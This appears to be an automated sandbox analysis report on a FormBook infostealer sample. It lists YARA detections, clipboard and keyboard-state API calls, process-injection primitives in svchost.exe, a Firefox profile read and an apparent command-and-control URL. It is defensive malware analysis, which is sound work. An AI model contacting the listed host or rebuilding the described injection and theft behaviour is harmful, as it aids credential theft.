Source: UNUqLBRwwpkr.exe, 00000009.00000002.3431974679.00000000042F2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.newbh.pro/z9pt/?5s8=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00F04164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00F04164

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00F04164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00F04164

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00F03F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00F03F66

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EF001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00EF001C

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00F1CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00F1CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1845812137.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3431429866.0000000004550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1851615513.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3430419586.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3431547878.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3431711821.0000000002780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1852595076.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00E93B3A
Source: J1VpshZJfm.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: J1VpshZJfm.exe, 00000000.00000000.1573696465.0000000000F44000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0f1744c0-d
Source: J1VpshZJfm.exe, 00000000.00000000.1573696465.0000000000F44000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_75c63fef-6
Source: J1VpshZJfm.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5a804de4-d
Source: J1VpshZJfm.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_cbc239ac-b

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C553 NtClose,	2_2_0042C553
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572B60 NtClose,LdrInitializeThunk,	2_2_03572B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03572DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035735C0 NtCreateMutant,LdrInitializeThunk,	2_2_035735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03574340 NtSetContextThread,	2_2_03574340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03574650 NtSuspendThread,	2_2_03574650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BF0 NtAllocateVirtualMemory,	2_2_03572BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BE0 NtQueryValueKey,	2_2_03572BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572B80 NtQueryInformationFile,	2_2_03572B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BA0 NtEnumerateValueKey,	2_2_03572BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AD0 NtReadFile,	2_2_03572AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AF0 NtWriteFile,	2_2_03572AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AB0 NtWaitForSingleObject,	2_2_03572AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F60 NtCreateProcessEx,	2_2_03572F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F30 NtCreateSection,	2_2_03572F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FE0 NtCreateFile,	2_2_03572FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F90 NtProtectVirtualMemory,	2_2_03572F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FB0 NtResumeThread,	2_2_03572FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FA0 NtQuerySection,	2_2_03572FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572E30 NtWriteVirtualMemory,	2_2_03572E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572EE0 NtQueueApcThread,	2_2_03572EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572E80 NtReadVirtualMemory,	2_2_03572E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572EA0 NtAdjustPrivilegesToken,	2_2_03572EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D10 NtMapViewOfSection,	2_2_03572D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D00 NtSetInformationFile,	2_2_03572D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D30 NtUnmapViewOfSection,	2_2_03572D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DD0 NtDelayExecution,	2_2_03572DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DB0 NtEnumerateKey,	2_2_03572DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C70 NtFreeVirtualMemory,	2_2_03572C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C60 NtCreateKey,	2_2_03572C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C00 NtQueryInformationProcess,	2_2_03572C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CC0 NtQueryVirtualMemory,	2_2_03572CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CF0 NtOpenProcess,	2_2_03572CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CA0 NtQueryInformationToken,	2_2_03572CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573010 NtOpenDirectoryObject,	2_2_03573010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573090 NtSetValueKey,	2_2_03573090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035739B0 NtGetContextThread,	2_2_035739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573D70 NtOpenThread,	2_2_03573D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573D10 NtOpenProcessToken,	2_2_03573D10

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EFA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00EFA1EF

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EE8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00EE8310

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EF51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00EF51BD

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EBD975	0_2_00EBD975
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00E9FCE0	0_2_00E9FCE0
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EB21C5	0_2_00EB21C5
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EC62D2	0_2_00EC62D2
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00F103DA	0_2_00F103DA
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EC242E	0_2_00EC242E
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EB25FA	0_2_00EB25FA
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EA66E1	0_2_00EA66E1
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00E9E6A0	0_2_00E9E6A0
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EEE616	0_2_00EEE616
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EC878F	0_2_00EC878F
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EF8889	0_2_00EF8889
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00F10857	0_2_00F10857
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EC6844	0_2_00EC6844
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EA8808	0_2_00EA8808
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EBCB21	0_2_00EBCB21
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EC6DB6	0_2_00EC6DB6
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EA6F9E	0_2_00EA6F9E
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EA3030	0_2_00EA3030
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EBF1D9	0_2_00EBF1D9
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EB3187	0_2_00EB3187
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00E91287	0_2_00E91287
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EB1484	0_2_00EB1484
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EA5520	0_2_00EA5520
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EB7696	0_2_00EB7696
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EA5760	0_2_00EA5760
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EB1978	0_2_00EB1978
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EC9AB5	0_2_00EC9AB5
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00F17DDB	0_2_00F17DDB
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EBBDA6	0_2_00EBBDA6
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EB1D90	0_2_00EB1D90
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EA3FE0	0_2_00EA3FE0
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00E9DF00	0_2_00E9DF00
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_018823D8	0_2_018823D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418413	2_2_00418413
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040287A	2_2_0040287A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401000	2_2_00401000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402880	2_2_00402880
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040211B	2_2_0040211B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402120	2_2_00402120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FBDB	2_2_0040FBDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FBE3	2_2_0040FBE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EB93	2_2_0042EB93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040249C	2_2_0040249C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004024A0	2_2_004024A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D30	2_2_00402D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004165CC	2_2_004165CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402E41	2_2_00402E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE03	2_2_0040FE03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416613	2_2_00416613
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DE13	2_2_0040DE13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF57	2_2_0040DF57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF63	2_2_0040DF63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA352	2_2_035FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036003E6	2_2_036003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C02C0	2_2_035C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C8158	2_2_035C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530100	2_2_03530100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F81CC	2_2_035F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036001AA	2_2_036001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F41A2	2_2_035F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564750	2_2_03564750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353C7C0	2_2_0353C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355C6E0	2_2_0355C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03600591	2_2_03600591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F2446	2_2_035F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4420	2_2_035E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EE4F6	2_2_035EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FAB40	2_2_035FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F6BD7	2_2_035F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360A9A6	2_2_0360A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354A840	2_2_0354A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03542840	2_2_03542840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E8F0	2_2_0356E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035268B8	2_2_035268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4F40	2_2_035B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560F30	2_2_03560F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E2F30	2_2_035E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03582F28	2_2_03582F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532FC8	2_2_03532FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354CFE0	2_2_0354CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BEFA0	2_2_035BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540E59	2_2_03540E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FEE26	2_2_035FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FEEDB	2_2_035FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552E90	2_2_03552E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FCE93	2_2_035FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DCD1F	2_2_035DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354AD00	2_2_0354AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353ADE0	2_2_0353ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03558DBF	2_2_03558DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540C00	2_2_03540C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530CF2	2_2_03530CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0CB5	2_2_035E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352D34C	2_2_0352D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F132D	2_2_035F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0358739A	2_2_0358739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355B2C0	2_2_0355B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E12ED	2_2_035E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035452A0	2_2_035452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360B16B	2_2_0360B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352F172	2_2_0352F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357516C	2_2_0357516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354B1B0	2_2_0354B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EF0CC	2_2_035EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035470C0	2_2_035470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F70E9	2_2_035F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF0E0	2_2_035FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF7B0	2_2_035FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03585630	2_2_03585630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F16CC	2_2_035F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7571	2_2_035F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036095C3	2_2_036095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DD5B0	2_2_035DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03531460	2_2_03531460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF43F	2_2_035FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFB76	2_2_035FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B5BF0	2_2_035B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357DBF9	2_2_0357DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355FB80	2_2_0355FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFA49	2_2_035FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7A46	2_2_035F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B3A6C	2_2_035B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EDAC6	2_2_035EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DDAAC	2_2_035DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03585AA0	2_2_03585AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E1AA3	2_2_035E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03549950	2_2_03549950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355B950	2_2_0355B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D5910	2_2_035D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AD800	2_2_035AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035438E0	2_2_035438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFF09	2_2_035FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03503FD2	2_2_03503FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03503FD5	2_2_03503FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03541F92	2_2_03541F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFFB1	2_2_035FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03549EB0	2_2_03549EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F1D5A	2_2_035F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03543D40	2_2_03543D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7D73	2_2_035F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355FDC0	2_2_0355FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B9C32	2_2_035B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFCF2	2_2_035FFCF2

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 035AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03587E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0352B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03575130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 035BF290 appears 105 times
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: String function: 00EB8900 appears 42 times
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: String function: 00E97DE1 appears 35 times
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: String function: 00EB0AE3 appears 70 times

Source: J1VpshZJfm.exe, 00000000.00000003.1583888421.0000000004203000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs J1VpshZJfm.exe
Source: J1VpshZJfm.exe, 00000000.00000003.1584048216.00000000043AD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs J1VpshZJfm.exe

Source: J1VpshZJfm.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/3@21/8

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EFA06A GetLastError,FormatMessageW,

0_2_00EFA06A

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EE81CB AdjustTokenPrivileges,CloseHandle,		0_2_00EE81CB
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EE87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00EE87E1

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EFB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00EFB3FB

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00F0EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00F0EE0D

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00F083BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00F083BB

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00E94E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00E94E89

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

File created: C:\Users\user\AppData\Local\Temp\autC5A6.tmp

Jump to behavior

Source: J1VpshZJfm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

